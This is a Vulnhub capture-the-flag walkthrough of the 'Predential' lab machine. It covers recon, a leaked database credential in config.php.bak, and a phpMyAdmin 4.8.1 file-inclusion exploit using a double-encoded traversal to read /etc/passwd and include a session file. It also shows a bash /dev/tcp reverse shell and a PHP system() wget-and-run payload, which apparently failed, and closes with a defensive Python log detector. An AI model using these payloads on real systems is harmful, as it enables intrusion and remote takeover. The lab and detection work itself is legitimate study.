Vulnhub: Predential target machine (partial) testing process
Predential
Identify the target host IP address
┌──(kali㉿kali)-[~/Vulnhub/Predential]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:06 1 60 Unknown vendor
192.168.56.100 08:00:27:9d:62:91 1 60 PCS Systemtechnik GmbH
192.168.56.119 08:00:27:a4:aa:48 1 60 PCS Systemtechnik GmbH
Using the netdiscover tool on Kali Linux, the target host IP address was identified as 192.168.56.119.
Nmap scan
┌──(kali㉿kali)-[~/Vulnhub/Predential]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.119 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-18 22:42 EDT
Nmap scan report for localhost (192.168.56.119)
Host is up (0.00085s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.5.38)
|_http-title: Ontario Election Services » Vote Now!
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.5.38
2082/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 0640f4e58cad1ae686dea575d0a2ac80 (RSA)
| 256 e9e63a838e94f298dd3e70fbb9a3e399 (ECDSA)
|_ 256 66a8a19fdbd5ec4c0a9c4d53156c436c (ED25519)
MAC Address: 08:00:27:A4:AA:48 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.86 seconds
The Nmap scan shows that the target host has 2 open ports: 80 (http) and 2082 (ssh).
Getting a shell
Visiting port 80 in a browser shows:
contact@votenow.local
An initial directory scan found nothing, but dirsearch did find a file:
┌──(kali㉿kali)-[~/Vulnhub/Predential]
└─$ dirsearch -u http://192.168.56.119
[23:16:02] 200 - 0B - /config.php
[23:16:02] 200 - 107B - /config.php.bak
[23:16:07] 200 - 11KB - /index.html
┌──(kali㉿kali)-[~/Vulnhub/Predential]
└─$ curl http://192.168.56.119/config.php.bak
<?php
$dbUser = "votebox";
$dbPass = "casoj3FFASPsbyoRP";
$dbHost = "localhost";
$dbname = "votebox";
?>
┌──(kali㉿kali)-[~/Vulnhub/Predential]
└─$ ssh votebox@192.168.56.119 -p 2082
The authenticity of host '[192.168.56.119]:2082 ([192.168.56.119]:2082)' can't be established.
ED25519 key fingerprint is SHA256:d+Zod13cfhVNilw/xRRCqquMQdOhDdQ1RVwTzx0mUdo.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.56.119]:2082' (ED25519) to the list of known hosts.
votebox@192.168.56.119: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).
At this point it is natural to suspect that one IP may be bound to several domain names, so looking for subdomains might reveal a way in.
┌──(kali㉿kali)-[~/Vulnhub/Predential]
└─$ sudo vim /etc/hosts
[sudo] password for kali:
┌──(kali㉿kali)-[~/Vulnhub/Predential]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.119 votenow.local
Next, brute-force the subdomains:
┌──(kali㉿kali)-[~/Vulnhub/Predential]
└─$ wfuzz -c -u 'http://votenow.local/' -H 'Host:FUZZ.votenow.local' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 854,45
The subdomain found is datasafe.
┌──(kali㉿kali)-[~/Vulnhub/Predential]
└─$ sudo vim /etc/hosts
┌──(kali㉿kali)-[~/Vulnhub/Predential]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.119 votenow.local
192.168.56.119 datasafe.votenow.local
Visiting datasafe.votenow.local now shows phpMyAdmin, and its version is 4.8.1.
https://www.exploit-db.com/exploits/50457
Note that this exploit code indicates the following URL is vulnerable to local file inclusion:
http://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
It returns the following:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
admin:x:1000:1000::/home/admin:/bin/bash
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
Open new phpMyAdmin window
Execute:
select '<?php phpinfo();exit;?>'
Find the session in the browser developer tools.
Put the session value from the cookie into the URL:
http://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_f9p26kcuq6nu2hu08rufs2iro74871lr
This proves that commands can be executed. Next, create a shell script:
┌──(kali㉿kali)-[~/Vulnhub/Predential]
└─$ vim shell.sh
┌──(kali㉿kali)-[~/Vulnhub/Predential]
└─$ cat shell.sh
bash -i >& /dev/tcp/192.168.56.206/5555 0>&1
Start a web server.
Then execute the SQL statement in phpMyAdmin:
select '<?php system("wget 192.168.56.206:8000/shell.sh; chmod +x shell.sh; bash shell.sh");exit;?>'
The statement executed without errors, but no shell came back; I don't know at which step the problem occurred.
STRIVE FOR PROGRESS, NOT FOR PERFECTION
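From the defender's side, the chain above leaves two clear traces in the Apache access log: the fetch of the exposed config.php.bak, and phpMyAdmin requests whose target= parameter carries a double-encoded ? (%253f) followed by ../ traversal, including the session-file include. The following detector is an added example, not part of the original walkthrough; the log lines are constructed to mirror the requests shown above.

```python
import re
from urllib.parse import unquote

# Constructed sample Apache combined-log lines modelled on the walkthrough (not real captures).
SAMPLE_LOG = """\
192.168.56.206 - - [18/Mar/2023:23:16:02 -0400] "GET /config.php.bak HTTP/1.1" 200 107 "-" "curl/7.88.1"
192.168.56.206 - - [18/Mar/2023:23:16:07 -0400] "GET /index.html HTTP/1.1" 200 11253 "-" "Mozilla/5.0"
192.168.56.206 - - [18/Mar/2023:23:40:11 -0400] "GET /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd HTTP/1.1" 200 2150 "-" "Mozilla/5.0"
192.168.56.206 - - [18/Mar/2023:23:41:30 -0400] "GET /index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_f9p26kcuq6nu2hu08rufs2iro74871lr HTTP/1.1" 200 98 "-" "Mozilla/5.0"
192.168.56.206 - - [18/Mar/2023:23:42:00 -0400] "GET /index.php?target=db_sql.php HTTP/1.1" 200 4021 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
BACKUP_RE = re.compile(r'\.(bak|old|orig|save)$|~$', re.IGNORECASE)   # backup copies of server-side files
TARGET_RE = re.compile(r'[?&]target=([^&\s]+)', re.IGNORECASE)         # phpMyAdmin's include parameter

def classify(line):
    """Return a list of finding tags for one access-log line (empty if nothing suspicious)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    path = m.group('path')
    findings = []
    # Finding 1: request for a backup copy of a server-side file (config.php.bak style).
    if BACKUP_RE.search(path.split('?', 1)[0]):
        findings.append('backup-file-fetch')
    # Finding 2: target= still holds an encoded '?' after one decode (the %253f trick)
    # and/or climbs upward with '../'; a session file as the final path is the RCE step.
    t = TARGET_RE.search(path)
    if t:
        once = unquote(t.group(1))   # %253f -> %3f, '../' untouched
        twice = unquote(once)        # %3f -> ?
        if '%3f' in once.lower() or '../' in twice:
            findings.append('pma-target-traversal')
            if '/var/lib/php/session/sess_' in twice:
                findings.append('session-file-include')
    return findings

def scan(log_text):
    """Map (ip, path) of each suspicious line to its findings; clean lines are omitted."""
    hits = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        tags = classify(line)
        if m and tags:
            hits[(m.group('ip'), m.group('path'))] = tags
    return hits

if __name__ == '__main__':
    for (ip, path), tags in scan(SAMPLE_LOG).items():
        print(f"{ip} {path[:60]} -> {', '.join(tags)}")
```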